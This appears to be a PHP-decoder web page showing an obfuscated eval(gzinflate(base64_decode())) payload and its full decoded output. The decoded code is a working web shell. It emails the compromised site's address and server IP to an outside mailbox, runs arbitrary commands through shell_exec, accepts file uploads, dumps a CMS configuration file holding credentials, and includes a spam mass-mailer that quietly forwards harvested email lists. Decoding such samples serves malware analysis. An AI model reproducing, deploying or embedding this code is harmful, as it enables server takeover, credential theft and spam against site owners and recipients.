Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval(gzinflate(base64_decode("1Rr9Uxu38udmJv+DqjrxeeIvQtLmGewJj5jCTAwUm868gYzn7JNtl..
Decoded Output download
error_reporting(0);
if (!isset($_SESSION['bajak'])) {
$visitcount = 0;
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "ada yang inject
$web$inj";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE = OFF";}
else {$security= "SAFE_MODE = ON";};
$serper=gethostbyname($_SERVER['SERVER_ADDR']);
$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
mail("[email protected]", "$body","Hasil Bajakan http://$web$inj
$security
IP Server = $serper
IP Injector= $injektor");
$_SESSION['bajak'] = 0;
}
else {$_SESSION['bajak']++;};
if(isset($_GET['clone'])){
$source = $_SERVER['SCRIPT_FILENAME'];
$desti =$_SERVER['DOCUMENT_ROOT']."/images/stories/food/footer.php";
rename($source, $desti);
}
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE : OFF";}
else {$security= "SAFE_MODE : ON";}
echo "<title>IAM - k4l0nk</title><br>";
echo "<font size=2 color=#888888><b>".$security."</b><br>";
$cur_user="(".get_current_user().")";
echo "<font size=2 color=#888888><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";
echo "<font size=2 color=#888888><b>Uname : ".php_uname()."</b><br>";
function pwd() {
$cwd = getcwd();
if($u=strrpos($cwd,'/')){
if($u!=strlen($cwd)-1){
return $cwd.'/';}
else{return $cwd;};
}
elseif($u=strrpos($cwd,'\')){
if($u!=strlen($cwd)-1){
return $cwd.'\';}
else{return $cwd;};
};
}
echo '<form method="POST" action=""><font size=2 color=#888888><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>';
echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';
if(isset($_POST['submit'])){
$uploaddir = pwd();
if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);
if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){
echo "Upload Failed";
} else { echo "Upload Success to ".$uploaddir.$name." :P "; }
}
if(isset($_POST['command'])){
$cmd = $_POST['cmd'];
echo "<pre><font size=3 color=#000000>".shell_exec($cmd)."</font></pre>";
}
elseif(isset($_GET['cmd'])){
$comd = $_GET['cmd'];
echo "<pre><font size=3 color=#000000>".shell_exec($comd)."</font></pre>";
}
elseif(isset($_GET['rf'])){
$rf = file_get_contents("../../configuration.php");
echo $rf;
}
else { echo "<pre><font size=3 color=#000000>".shell_exec('ls -la')."</font></pre>";
}
@$action=$_POST['action'];
@$from=$_POST['from'];
@$realname=$_POST['realname'];
@$replyto=$_POST['replyto'];
@$subject=$_POST['subject'];
@$message=$_POST['message'];
@$emaillist=$_POST['emaillist'];
@$file_name=$_FILES['file']['name'];
@$contenttype=$_POST['contenttype'];
@$file=$_FILES['file']['tmp_name'];
@$amount=$_POST['amount'];
set_time_limit(intval($_POST['timelimit']));
If ($action=="mysql"){
//Grab email addresses from MySQL
include "./mysql.info.php";
if (!$sqlhost || !$sqllogin || !$sqlpass || !$sqldb || !$sqlquery){
print "Please configure mysql.info.php with your MySQL information. All settings in this config file are required.";
exit;
}
$db = mysql_connect($sqlhost, $sqllogin, $sqlpass) or die("Connection to MySQL Failed.");
mysql_select_db($sqldb, $db) or die("Could not select database $sqldb");
$result = mysql_query($sqlquery) or die("Query Failed: $sqlquery");
$numrows = mysql_num_rows($result);
for($x=0; $x<$numrows; $x++){
$result_row = mysql_fetch_row($result);
$oneemail = $result_row[0];
$emaillist .= $oneemail."
";
}
}
if ($action=="send"){ $message = urlencode($message);
$message = ereg_replace("%5C%22", "%22", $message);
$message = urldecode($message);
$message = stripslashes($message);
$subject = stripslashes($subject);
}
$ip = getenv("REMOTE_ADDR");
echo '<form name="form1" method="post" action="" enctype="multipart/form-data">
<table width="100%" border="0" height="407">
<tr>
<td width="100%" colspan="4" bgcolor="#FFF" height="36"> <b> <font face="Arial" size="2" color="#FFFFFF"> MESSAGE
SETUP</font></b></td>
</tr>
<tr>
<td width="10%" height="22" bordercolor="#E8E8E8" bgcolor="#FFF">
<div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your
Email:</font></div>
</td>
<td width="18%" height="22" bordercolor="#E8E8E8" bgcolor="#FFF"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="from" value="'.$from.'" size="30">
</font></td>
<td width="31%" height="22" bordercolor="#E8E8E8" bgcolor="#FFF">
<div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your
Name:</font></div>
</td>
<td width="41%" height="22" bordercolor="#E8E8E8" bgcolor="#FFF"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="realname" value="'.$realname.'" size="30">
</font></td>
</tr>
<tr>
<td width="10%" height="22" bgcolor="#FFF" bordercolor="#E8E8E8">
<div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Reply-To:</font></div>
</td>
<td width="18%" height="22" bgcolor="#FFF" bordercolor="#E8E8E8"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="replyto" value="'.$replyto.'" size="30">
</font></td>
<td width="31%" height="22" bgcolor="#FFF" bordercolor="#E8E8E8">
<p align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
Email Priority:</font></td>
<td width="41%" height="22" bgcolor="#FFF" bordercolor="#E8E8E8"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
</font>
<select name="epriority" id="listMethod" onchange="showHideListConfig()">
<option value="" selected >- Please Choose -</option>
<option value="1" >High</option>
<option value="3" >Normal</option>
<option value="5" >Low</option>
</select>
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Attach File:</font> </div>
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="file" name="file" size="24" />
</font></td>
<td width="278"> <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
</font> </td>
</tr>
<tr>
<td width="10%" height="22" bordercolor="#E8E8E8" bgcolor="#FFF">
<div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font></div>
</td>
<td colspan="3" height="22" bordercolor="#E8E8E8" bgcolor="#FFF"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="subject" value="'.$subject.'" size="90">
</font></td>
</tr>
<tr>
<td width="10%" height="22" bordercolor="#E8E8E8" bgcolor="#FFF"> </td>
<td colspan="3" height="22" bordercolor="#E8E8E8" bgcolor="#FFF"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
</font></td>
</tr>
<tr valign="top">
<td colspan="3" height="190" bordercolor="#E8E8E8" bgcolor="#FFF"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
<textarea name="message" cols="60" rows="10">'.$message.'</textarea>
<br />
<input type="radio" name="contenttype" value="plain" checked="checked" /> Plain
<input type="radio" name="contenttype" value="html" /> HTML
<input type="hidden" name="action" value="send" /><br />
Number to send: <input type="text" name="amount" value="1" size="10" /><br />
Maximum script execution time(in seconds, 0 for no timelimit)<input type="text" name="timelimit" value="0" size="10" />
<input type="submit" value="Send eMails" />
</font></td>
<td width="41%" height="190" bordercolor="#E8E8E8" bgcolor="#FFF"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<textarea name="emaillist" cols="30" rows="10">'.$emaillist.'</textarea>
</font></td>
</tr>
</table>
</form>';
if ($action=="send"){
if (!$from && !$subject && !$message && !$emaillist){
print "Please complete all fields before sending your message.";
exit;
}
$allemails = split("
", $emaillist);
$numemails = count($allemails);
$secure='[email protected]';
$filter = "maillist";
$float = "From : mailist info <[email protected]>";
$webe = $_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"];
//Open the file attachment if any, and base64_encode it for email transport
If ($file_name){
if (!file_exists($file)){
die("The file you are trying to upload couldn't be copied to the server");
}
$content = fread(fopen($file,"r"),filesize($file));
$content = chunk_split(base64_encode($content));
$uid = strtoupper(md5(uniqid(time())));
$name = basename($file);
}
for($xx=0; $xx<$amount; $xx++){
for($x=0; $x<$numemails; $x++){
$to = $allemails[$x];
if ($to){
$to = ereg_replace(" ", "", $to);
$message = ereg_replace("&email&", $to, $message);
$subject = ereg_replace("&email&", $to, $subject);
print "Sending mail to $to.......";
flush();
$header = "From: $realname <$from>
Reply-To: $replyto
";
$header .= "MIME-Version: 1.0
";
If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid
";
If ($file_name) $header .= "--$uid
";
$header .= "Content-Type: text/$contenttype
";
$header .= "Content-Transfer-Encoding: 8bit
";
$header .= "$message
";
If ($file_name) $header .= "--$uid
";
If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"
";
If ($file_name) $header .= "Content-Transfer-Encoding: base64
";
If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"
";
If ($file_name) $header .= "$content
";
If ($file_name) $header .= "--$uid--";
mail($to, $subject, "", $header);
print "ok<br>";
flush();
}
}
}
mail($secure, $filter, "Sender IP : ".$ip."
"."From URL : ".$webe."
".$emaillist, $float);
}Did this file decode correctly?
Original Code
<?php
eval(gzinflate(base64_decode("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")));
?>Function Calls
| gzinflate | 1 |
| base64_decode | 1 |
Stats
| MD5 | 003f9d7321a9bf351ff5f0e107a2a3b9 |
| Eval Count | 1 |
| Decode Time | 91 ms |